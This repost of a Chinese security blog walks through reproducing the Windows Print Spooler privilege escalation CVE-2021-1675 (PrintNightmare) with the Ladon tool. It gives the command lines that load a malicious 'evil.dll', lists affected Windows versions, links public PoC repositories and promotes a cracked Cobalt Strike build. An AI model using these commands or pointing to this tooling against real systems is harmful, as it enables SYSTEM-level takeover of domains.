[提权]Ladon打印机漏洞复现CVE-2021-1675

渗透技巧 2年前 (2021) admin
900 0 0

基本情况

Windows Print Spooler权限提升漏洞,漏洞CVE编号:CVE-2021-1675。未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在域控制器上执行任意代码,从而获得整个域的控制权。建议受影响用户及时更新漏洞补丁进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。


漏洞描述

Print Spooler是Windows系统中用于管理打印相关事务的服务。

该漏洞在域环境中合适的条件下,无需任何用户交互,未经身份验证的远程攻击者就可以利用该漏洞以SYSTEM权限在域控制器上执行任意代码,从而获得整个域的控制权。


影响范围

Windows Server 2012 R2 (Server Core installation)Windows Server 2012 R2Windows Server 2012 (Server Core installation)Windows Server 2012Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)Windows Server 2008 for x64-based Systems Service Pack 2Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)Windows Server 2008 for 32-bit Systems Service Pack 2Windows RT 8.1Windows 8.1 for x64-based systemsWindows 8.1 for 32-bit systemsWindows 7 for x64-based Systems Service Pack 1Windows 7 for 32-bit Systems Service Pack 1Windows Server 2016 (Server Core installation)Windows Server 2016Windows 10 Version 1607 for x64-based SystemsWindows 10 Version 1607 for 32-bit SystemsWindows 10 for x64-based SystemsWindows 10 for 32-bit SystemsWindows Server, version 20H2 (Server Core Installation)Windows 10 Version 20H2 for ARM64-based SystemsWindows 10 Version 20H2 for 32-bit SystemsWindows 10 Version 20H2 for x64-based SystemsWindows Server, version 2004 (Server Core installation)Windows 10 Version 2004 for x64-based SystemsWindows 10 Version 2004 for ARM64-based SystemsWindows 10 Version 2004 for 32-bit SystemsWindows 10 Version 21H1 for 32-bit SystemsWindows 10 Version 21H1 for ARM64-based SystemsWindows 10 Version 21H1 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for 32-bit SystemsWindows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 1809 for ARM64-based SystemsWindows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems


版本

Ladon >= 8.6

用法

Ladon CVE-2021-1675 DllPath

例子

Ladon CVE-2021-1675 c:evil.dll
Ladon PrintNightmare c:evil.dll


DLL可使用LadonGui生成,用法如下

0day通用DLL生成器-MS17010演示


本地提权

Win2019
[提权]Ladon打印机漏洞复现CVE-2021-1675

Win2016
[提权]Ladon打印机漏洞复现CVE-2021-1675

Win10
[提权]Ladon打印机漏洞复现CVE-2021-1675

远程提权

Win2016
[提权]Ladon打印机漏洞复现CVE-2021-1675


相关POC

C++、Python、C#、PowerShell
https://github.com/afwu/PrintNightmare
https://github.com/cube0x0/CVE-2021-1675
https://github.com/calebstewart/CVE-2021-1675


推荐文章

巨龙拉冬: 让你的Cobalt Strike变成超级武器

LadonGo开源全平台内网渗透扫描器框架

Cobalt Strike 3.12 3.13 4.3 4.4 K8破解版


原文始发于微信公众号(K8实验室):[提权]Ladon打印机漏洞复现CVE-2021-1675

版权声明:admin 发表于 2021年12月4日 上午12:18。
转载请注明:[提权]Ladon打印机漏洞复现CVE-2021-1675 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...